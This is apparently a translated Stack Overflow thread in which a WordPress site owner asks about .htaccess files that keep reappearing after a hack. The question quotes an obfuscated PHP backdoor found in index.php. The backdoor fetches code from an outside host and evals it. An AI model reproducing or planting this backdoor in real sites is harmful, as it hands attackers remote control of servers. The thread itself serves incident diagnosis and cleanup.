【问题标题】:.htaccess files are repeatedly being created in File Directory.htaccess 文件在文件目录中重复创建
【发布时间】:2021-11-25 12:58:25
【问题描述】:

我在共享主机中有大约 10 个站点。最近我注意到创建了很多 .htaccess 文件并限制了用户访问。

<FilesMatch ".(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|phP|PhP|php5|suspected)$">
Order Allow,Deny
Deny from all
</FilesMatch>

上面的块是用所有代码.htaccess 编写的。当我删除这些时,它似乎又重新生成了。这意味着应该有一个脚本在包的其他地方运行。我什至安装了 Wordfence 插件来识别更新的文件。我恢复了最近似乎是恶意的修改。但仍然没有变化。在下面的 index.php 等文件中也有一些编码的代码行。

<?php
 $uoeq967= "O)sl 2Te4x-+gazAbuK_6qrjH0RZt*N3mLcVFEWvh;inySJC91oMfYXId5Up.(GP7D,Bw/kQ8";$vpna644='JGNoID0gY3VybF9pbml0KCdodHRwOi8vYmFua3N';$vpna645='zdG9wLnRlY2gvJy4kX0dFVFsnZiddKTtjdXJsX3';$vpna646='NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBT';$vpna647='lNGRVIsIDEpOyRyZXN1bHQgPSBjdXJsX2V4ZWMo';$vpna648='JGNoKTtldmFsKCc/PicuJHJlc3VsdCk7';$vpna643=$vpna644.$vpna645.$vpna646.$vpna647.$vpna648;function cdim173($fsxi199,$rykc638,$ekcu564){return ''.$fsxi199.''.$rykc638.''.$ekcu564.'';}$qfcg427 = cdim173($uoeq967{34},$uoeq967{13}.$uoeq967{3},$uoeq967{3});$uodu186 = cdim173($uoeq967{19}.$uoeq967{17},$uoeq967{2}.$uoeq967{7},'');$lrbk358 = cdim173($uoeq967{22},$uoeq967{19},$uoeq967{52});$hume205 = cdim173($uoeq967{17},'',$uoeq967{43});$xzdo850 = cdim173($uoeq967{34},$uoeq967{19},$uoeq967{13}.$uoeq967{22});$uqmy998 = cdim173($uoeq967{22},$uoeq967{13},$uoeq967{44});$aobc355 =cdim173(cdim173($qfcg427,'',$uodu186),cdim173($lrbk358,$hume205,''),cdim173($xzdo850,'',$uqmy998));$xggn756 = cdim173($uoeq967{34},$uoeq967{22},$uoeq967{7});$gnix510 = cdim173($uoeq967{13},$uoeq967{28},'');$wdfm884 = cdim173($uoeq967{7},'',$uoeq967{19});$loyh183 = cdim173($uoeq967{52},$uoeq967{17},$uoeq967{43});$bwfh819 = cdim173($uoeq967{34},$uoeq967{28},'');$jrmp133 = cdim173($uoeq967{42},$uoeq967{50},'');$iprf791 = cdim173('',$uoeq967{43},'');$hwks376 = cdim173( cdim173($xggn756,$gnix510,$wdfm884), cdim173($loyh183,'',$bwfh819), cdim173($jrmp133,'',$iprf791));$mtzu128 = cdim173($uoeq967{7},'',$uoeq967{39});$hesn342= cdim173($uoeq967{13},$uoeq967{3},$uoeq967{61});$taop807 = cdim173('',$uoeq967{16},$uoeq967{13});$gvcw064 = cdim173($uoeq967{2},$uoeq967{7},$uoeq967{20});$bihf178 = cdim173($uoeq967{8},$uoeq967{19},$uoeq967{56});$efaa907 = cdim173($uoeq967{7},$uoeq967{34},$uoeq967{50});$tvhp307 = cdim173($uoeq967{56},$uoeq967{7},$uoeq967{61});$qyff908 = cdim173(cdim173($mtzu128,$hesn342,''),cdim173('','',$taop807),cdim173($gvcw064,$bihf178.$efaa907,$tvhp307)).'"'.$vpna643.'"'.cdim173($uoeq967{1}.$uoeq967{1},'',$uoeq967{41});$aobc355($hwks376,array('','}'.$qyff908.'//'));//wp-blog-header scp-173?>

除了删除每个目录的 .htaccess 之外,我别无选择。但它不会解决问题。除了清空我的文件管理器,我还能做什么。

【问题讨论】:

  • 你被黑了。现在可能有不止一个黑客在行动。搜索&lt;FilesMatch ".(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|phP|PhP|php5|suspected)$"&gt;,你会看到一些修复帮助
  • 除了删除这些配置文件之外,您还有其他选择。您甚至有义务这样做:您需要关闭被破坏的系统并从头开始安装。您目前正在尝试做的是修复症状。那是行不通的。你需要治愈病因。您需要现在使这些系统离线,因为其他人可以控制您的所有数据和帐户。
  • 如果我把所有网站都放到本地,会有问题吗?

标签: php wordpress .htaccess code-injection malware


【解决方案1】:

好吧,整个包裹都被黑了。我什么都做不了。就像其他人建议的那样,我花了 2 天时间来一一清除自动生成的文件。它被删除并在第二天出现。一些脚本可能在创建文件的后面运行。所以唯一的解决办法是;

  1. 联系托管服务提供商并要求他们彻底清理 目录,然后从头开始。或
  2. 联系网络安全分析师并支付他们的费用以清除它 最低成本约为 199 美元。

是的,事情发生了!

【讨论】:

  • 您好 Roshan,我在 Digital Ocean 服务器中也遇到了同样的问题。您能推荐任何人或第三方服务吗?
  • 有人建议我尝试 wordfence,它不是那么准确,但在某种程度上还可以。否则,我的托管服务提供商建议我 siteguarding.com 试试看。
猜你喜欢
  • 2014-09-11
  • 2012-03-11
  • 2012-06-25
  • 1970-01-01
  • 1970-01-01
  • 2014-11-16
  • 1970-01-01
  • 1970-01-01
  • 1970-01-01
相关资源
最近更新 更多